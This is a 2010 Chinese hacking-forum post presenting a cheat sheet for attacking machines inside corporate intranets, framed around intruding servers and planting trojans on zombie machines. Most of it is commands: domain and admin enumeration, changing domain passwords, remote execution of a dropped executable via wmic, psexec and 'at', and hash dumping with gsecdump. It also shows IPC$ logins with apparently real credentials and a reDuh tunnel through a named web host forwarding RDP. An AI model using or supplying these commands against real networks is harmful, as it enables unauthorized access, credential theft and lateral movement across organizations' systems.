WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2242查看
  • 1回复

主题

好友

1014

积分

金牌会员

发表于 2010-4-29 12:07:06 |显示全部楼层
入侵网站也好,服务器也好,放木马抓肉鸡也好,总会遇到一些内网的问题,那么如果要弄的机器在一个内网中如何处理呢?
今天[月]就来带大家认识一下。
教程较长,分节来。
后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。
    已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。
    常用命令
    net view
    查看同一域/工作组的计算机列表
    net view /domain
    查看域/工作组列表
    net view /domain:Secwing
    查看Secwing域中 计算机列表
    net group /domain
    查看所在域的组
    net user /domain
    查看所在域用户
    net user /domain zerosoul 12345678
    修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限
    net localgroup administrators SECWING\zerosoul /add
    域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行
    下面的命令 只能用于 域控制器:
    net group "Domain controllers"
    查看域控制器(如果有多台)
    net group
    查看域的组
    net group "domain admins"
    查看域管理员
    net group "domain users"
    查看域管理员
    PS:打开配置域控制器向导的命令
    dcpromo
    psexec /accepteula 绕过第一次验证窗口
    mstsc/admin 解决hash无法抓出问题
    wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe
    psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件并且执行
    psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash
    net use \\172.16.16.2\IPC$ "k78m90" /user:"admintitrator"
    net use \\172.16.16.2\IPC$ "k78m90" /user:"aABIMAQ\Administrator"
    net time \\172.16.16.2
    at \\172.16.16.2 13:50 2009.exe
    java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令
    [createTunnel]1234:127.0.0.1:3389 端口转向命令

主题

好友

24

积分

新手上路

发表于 2010-5-12 05:16:07 |显示全部楼层
来学习技术的
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-29 13:19 , Processed in 0.076456 second(s), 16 queries .

返回顶部